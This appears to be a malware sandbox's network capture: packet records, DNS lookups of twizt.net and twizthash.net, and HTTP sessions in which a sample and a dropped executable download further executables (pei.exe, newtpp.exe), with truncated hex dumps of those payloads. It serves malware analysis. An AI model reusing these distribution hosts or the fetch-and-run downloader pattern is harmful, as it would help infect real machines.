Dec 5, 2024 17:32:18.421155930 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.421993971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.422012091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.422049999 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.422347069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.422894955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.422950029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.422990084 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.423027039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.423827887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.423887968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.424108028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.424192905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.424746037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.424804926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.425744057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.425761938 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.425776005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.425801992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.425816059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.426661015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.426721096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.427066088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.427133083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.427537918 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.427583933 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.427644968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.427680969 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.428432941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.428483963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.428705931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.428752899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.429475069 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.429533005 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.429579020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.429616928 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.430418968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.430475950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.430541992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.430582047 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.431324959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.431382895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.431431055 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.431472063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.432213068 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.432270050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.432768106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.432823896 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.433137894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.433187008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.433209896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.433245897 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.434062958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.434122086 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.434232950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.434277058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.435010910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.435029030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.435064077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.435076952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.435955048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.436014891 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.436019897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.436057091 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.436827898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.436873913 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.436886072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.436906099 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.437778950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.437840939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.437968016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.438009024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.438713074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.438770056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.438860893 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.438899994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.439650059 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.439702988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.583096981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.583161116 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.583365917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.583410978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.583554029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.583596945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.583688021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.583738089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.584481955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.584515095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.584594011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.584626913 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.585537910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.585597038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.585760117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.585817099 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.586730003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.586802006 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.586908102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.586958885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.587402105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.587445974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.587500095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.587539911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.588181973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.588248014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.588521957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.588573933 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.589051008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.589112043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.589210033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.589318037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.590085030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.590148926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.590224981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.590270042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.590945959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.591006041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.591373920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.591430902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.591883898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.591937065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.592303991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.592355967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.592794895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.592845917 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.592900991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.592942953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.593740940 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.593833923 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.593904018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.593947887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.594660044 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:18.594738007 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:18.594888926 CET	80	49793	185.215.113.84	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 17:31:43.307086945 CET	192.168.2.11	1.1.1.1	0xbc68	Standard query (0)	twizt.net	A (IP address)	IN (0x0001)	false
Dec 5, 2024 17:32:38.962316990 CET	192.168.2.11	1.1.1.1	0x1eba	Standard query (0)	www.geoplugin.net	A (IP address)	IN (0x0001)	false
Dec 5, 2024 17:34:05.082914114 CET	192.168.2.11	1.1.1.1	0x9b9d	Standard query (0)	twizthash.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 17:31:35.644205093 CET	1.1.1.1	192.168.2.11	0x65df	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 17:31:35.644205093 CET	1.1.1.1	192.168.2.11	0x65df	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 5, 2024 17:31:43.593244076 CET	1.1.1.1	192.168.2.11	0xbc68	No error (0)	twizt.net		185.215.113.66	A (IP address)	IN (0x0001)	false
Dec 5, 2024 17:32:39.100759983 CET	1.1.1.1	192.168.2.11	0x1eba	No error (0)	www.geoplugin.net	geoplugin.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 17:32:39.100759983 CET	1.1.1.1	192.168.2.11	0x1eba	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false
Dec 5, 2024 17:34:05.362502098 CET	1.1.1.1	192.168.2.11	0x9b9d	No error (0)	twizthash.net		185.215.113.66	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49710	185.215.113.66	80	7420	C:\Users\user\Desktop\f5TWdT5EAc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:31:39.088346958 CET	280	OUT	GET /pei.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.215.113.66 Connection: Keep-Alive
Dec 5, 2024 17:31:40.486912966 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:31:40 GMT Content-Type: application/octet-stream Content-Length: 10240 Last-Modified: Sun, 24 Nov 2024 16:23:03 GMT Connection: keep-alive ETag: "674352e7-2800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 52 43 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 16 00 00 00 00 00 00 e1 16 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 d6 e4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$gd##`p#`p#`p}p!`p}p"`p}p6`pp(`p#ap`p}p `p*}p"`pRich#`pPELrRCg @`@l$@P#@ .text: `.rdata4 @@.data0@.rsrc@ @@.relocP$@B
Dec 5, 2024 17:31:40.486928940 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 ec 10 04 00 00 68 04 01 00 00 8d 84 24 0c 02 00 00 50 68 b4 21 40 00 ff 15 1c 20 40 Data Ascii: h$Ph!@ @$QT$h!@R @$P @t
Dec 5, 2024 17:31:40.488637924 CET	1236	IN	Data Raw: 32 c0 81 c4 10 04 00 00 c3 6a 00 6a 02 6a 01 6a 00 6a 00 68 00 00 00 40 8d 4c 24 18 51 ff 15 20 20 40 00 83 f8 ff 74 07 50 ff 15 24 20 40 00 b0 01 81 c4 10 04 00 00 c3 cc 83 ec 54 6a 44 8d 44 24 14 6a 00 50 e8 33 03 00 00 83 c4 0c 33 c0 8d 14 24 Data Ascii: 2jjjjjh@L$Q @tP$ @TjDD$jP33$RD$D$D$D$D$Pjjj jjfL$\L$tjQjD$8DD$d @uh @T2T,SUV @Ph$4Ph!@D$ @
Dec 5, 2024 17:31:40.488686085 CET	1236	IN	Data Raw: 98 20 40 00 8b 30 89 75 e0 8a 06 3c 20 77 4c 84 c0 74 06 83 7d e4 00 75 42 8a 06 84 c0 74 0a 3c 20 77 06 46 89 75 e0 eb f0 f6 45 c4 01 74 06 0f b7 45 c8 eb 03 6a 0a 58 50 56 6a 00 68 00 00 40 00 e8 ff fd ff ff a3 30 30 40 00 83 3d 24 30 40 00 00 Data Ascii: @0u< wLt}uBt< wFuEtEjXPVjh@00@=$0@u[P @<"u39MMP @YtFuFEMPQYYeE00@=$0@uP @=40@u @E00@3@eEMZf9@t
Dec 5, 2024 17:31:40.488697052 CET	248	IN	Data Raw: 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 68 06 1b 40 00 68 10 30 40 00 e8 f1 00 00 00 83 c4 18 5d c3 8b ff 56 68 00 00 03 00 68 00 00 01 00 33 f6 56 e8 e3 00 00 00 83 c4 Data Ascii: MdY__^[]QUuuuuh@h0@]Vhh3VtVVVVV^3U0@eeSWN@;tt0@`VEP4 @u3u0 @3, @3 @3EP( @E3E3;uO@u50@
Dec 5, 2024 17:31:40.490406990 CET	1236	IN	Data Raw: 40 00 5e 5f 5b c9 c3 ff 25 58 20 40 00 ff 25 5c 20 40 00 ff 25 c4 20 40 00 ff 25 64 20 40 00 3b 0d 10 30 40 00 75 02 f3 c3 e9 13 00 00 00 cc ff 25 70 20 40 00 ff 25 74 20 40 00 ff 25 78 20 40 00 8b ff 55 8b ec 81 ec 28 03 00 00 a3 58 31 40 00 89 Data Ascii: @^_[%X @%\ @% @%d @;0@u%p @%t @%x @U(X1@T1@P1@L1@5H1@=D1@fp1@fd1@f@1@f<1@f%81@f-41@h1@E\1@E`1@El1@0@`1@\0@P0@T0@0@
Dec 5, 2024 17:31:40.490453959 CET	1236	IN	Data Raw: 00 70 00 25 00 00 00 00 00 25 00 73 00 5c 00 33 00 33 00 35 00 37 00 33 00 35 00 33 00 37 00 2e 00 6a 00 70 00 67 00 00 00 25 00 74 00 65 00 6d 00 70 00 25 00 00 00 00 00 25 00 73 00 5c 00 25 00 64 00 25 00 64 00 2e 00 65 00 78 00 65 00 00 00 00 Data Ascii: p%%s\33573537.jpg%temp%%s\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko
Dec 5, 2024 17:31:40.490464926 CET	248	IN	Data Raw: 78 69 74 00 00 fd 00 5f 61 63 6d 64 6c 6e 00 04 02 5f 69 6e 69 74 74 65 72 6d 00 05 02 5f 69 6e 69 74 74 65 72 6d 5f 65 00 3c 01 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 00 e3 00 5f 5f 73 65 74 75 73 65 72 6d 61 74 68 65 72 72 00 Data Ascii: xit_acmdln_initterm_initterm_e<_configthreadlocale__setusermatherr_adjust_fdiv__p__commode__p__fmodej_encode_pointer__set_app_typeC?terminate@@YAXXZ_unlock__dllonexitv_lock_onexit`_decode_pointe
Dec 5, 2024 17:31:40.491444111 CET	1236	IN	Data Raw: 65 78 63 65 70 74 5f 68 61 6e 64 6c 65 72 34 5f 63 6f 6d 6d 6f 6e 00 0b 02 5f 69 6e 76 6f 6b 65 5f 77 61 74 73 6f 6e 00 00 3f 01 5f 63 6f 6e 74 72 6f 6c 66 70 5f 73 00 00 4b 01 5f 63 72 74 5f 64 65 62 75 67 67 65 72 5f 68 6f 6f 6b 00 00 97 00 49 Data Ascii: except_handler4_common_invoke_watson?_controlfp_sK_crt_debugger_hookInternetOpenUrlAjInternetCloseHandleInternetOpenAInternetReadFileInternetOpenUrlWInternetOpenWWININET.dllfURLDownloadToFileWurlmon.dllCCl
Dec 5, 2024 17:31:40.491530895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 5, 2024 17:31:40.606827021 CET	248	IN	Data Raw: 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 Data Ascii: GPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGt00+020?0f0r0001&111X1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49721	185.215.113.66	80	7608	C:\Users\user\AppData\Local\Temp\34D7.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:31:43.727128029 CET	174	OUT	GET /newtpp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Host: twizt.net
Dec 5, 2024 17:31:45.063201904 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:31:44 GMT Content-Type: application/octet-stream Content-Length: 80896 Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT Connection: keep-alive ETag: "6733d71b-13c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd d6 33 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 00 00 00 64 00 00 00 00 00 00 90 75 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PEL3gdu@p$.text `.rdata34@@.data(/@ @
Dec 5, 2024 17:31:45.063225985 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66 Data Ascii: Ul$E V3W\|$ tO9ufPf;Wt@uu"j UGfO
Dec 5, 2024 17:31:45.064635038 CET	1236	IN	Data Raw: 66 89 4e 04 8b 55 20 89 56 1c 83 c4 04 89 75 20 e8 45 c4 00 00 8b 4c 24 14 8b 7c 24 18 89 46 08 8b 44 24 1c 50 51 e8 0f 05 00 00 83 c4 08 84 c0 74 75 53 8d a4 24 00 00 00 00 8b 4e 0c 83 f9 04 72 64 8b 46 18 8b 10 83 c2 04 3b d1 77 58 83 7d 0c 00 Data Ascii: fNU Vu EL$\|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWUNxF;uF+tP9RQA)~[_^]USV3W}\$OD$Phf@QD$$A
Dec 5, 2024 17:31:45.064647913 CET	1236	IN	Data Raw: 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 18 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 1c 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 6a 00 56 68 00 11 40 00 6a 00 6a 00 89 5e 0c ff 15 a0 Data Ascii: $D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFAFFT$FWRPy~;uF;vu]F[Ft;r+F][+n][W\|$/
Dec 5, 2024 17:31:45.064659119 CET	248	IN	Data Raw: 00 00 8b 3d 34 01 41 00 ff d7 8b 74 24 0c 2b c6 3d e8 03 00 00 72 3e 8d 73 20 56 ff 15 f4 00 41 00 8b 7b 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 f8 00 41 00 e9 80 00 00 00 e8 e6 fd ff ff 56 ff 15 f8 00 41 Data Ascii: =4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVRXA.+r`tP`uC PA4AD$CjP`A_^[]S
Dec 5, 2024 17:31:45.065449953 CET	1236	IN	Data Raw: 00 55 8b 6c 24 0c 8b 8d 60 02 00 00 57 6a 00 56 6a 00 8d 44 24 1c 50 6a 01 8d 7e 1c 57 51 c7 44 24 2c 00 00 00 00 ff d3 85 c0 74 3e ff 15 58 02 41 00 3d e5 03 00 00 74 31 3d 33 27 00 00 75 30 6a 01 ff 15 38 01 41 00 8b 85 60 02 00 00 6a 00 56 6a Data Ascii: Ul$`WjVjD$Pj~WQD$,t>XA=t1=3'u0j8A`jVjT$RjWPD$,u_][_]2[SW\|$2?ilci8uUl$Vj<L$D$ UQF0Fnn$WF F,uV
Dec 5, 2024 17:31:45.065504074 CET	1236	IN	Data Raw: 15 58 02 41 00 8b f0 8b 5c 24 18 8b 44 24 14 8b 4c 24 10 56 e8 8d fd ff ff 83 c4 04 6a ff 8d 4c 24 18 51 8b 4f 08 8d 54 24 18 52 8d 44 24 24 33 f6 50 51 89 74 24 2c 89 74 24 24 89 74 24 28 ff d5 8b 4c 24 10 85 c0 0f 95 c0 3b ce 75 8b 5b 5f 5e 5d Data Ascii: XA\$D$L$VjL$QOT$RD$$3PQt$,t$$t$(L$;u[_^]8VjLe}rD$PPCOI(AL$,F PVAjjjjAF)jjjjAFFjjjjjj
Dec 5, 2024 17:31:45.065515995 CET	248	IN	Data Raw: fc 8b 51 08 52 8b 45 fc 8b 08 51 e8 d2 12 00 00 83 c4 08 8b 55 fc 8b 02 50 e8 04 7d 00 00 83 c4 04 8b 4d fc c7 41 08 00 00 00 00 8b 55 fc c7 42 04 00 00 00 00 8b 45 08 8b 08 51 e8 e2 7c 00 00 83 c4 04 8b 55 08 c7 02 00 00 00 00 8b e5 5d c3 cc cc Data Ascii: QREQUP}MAUBEQ\|U]UEEMQURAEPMQUREQ'EUREQBUBE]UEM;Hs=UUEEMU;QsEUE
Dec 5, 2024 17:31:45.069541931 CET	1236	IN	Data Raw: 04 33 c0 e9 c7 00 00 00 8b 55 08 8b 42 08 3b 45 0c 0f 83 89 00 00 00 8b 4d 08 8b 51 08 89 55 f4 8b 45 0c c1 e0 02 50 e8 ee 79 00 00 83 c4 04 89 45 f0 8b 4d 08 8b 11 89 55 f8 83 7d f0 00 75 1c 8b 45 f4 50 8b 4d f8 51 e8 9d 11 00 00 83 c4 08 8b 55 Data Ascii: 3UB;EMQUEPyEMU}uEPMQUR{EPMQUR:EPMQjUR{EMUEBMQUEEM;MsUM3]UEHQUP8
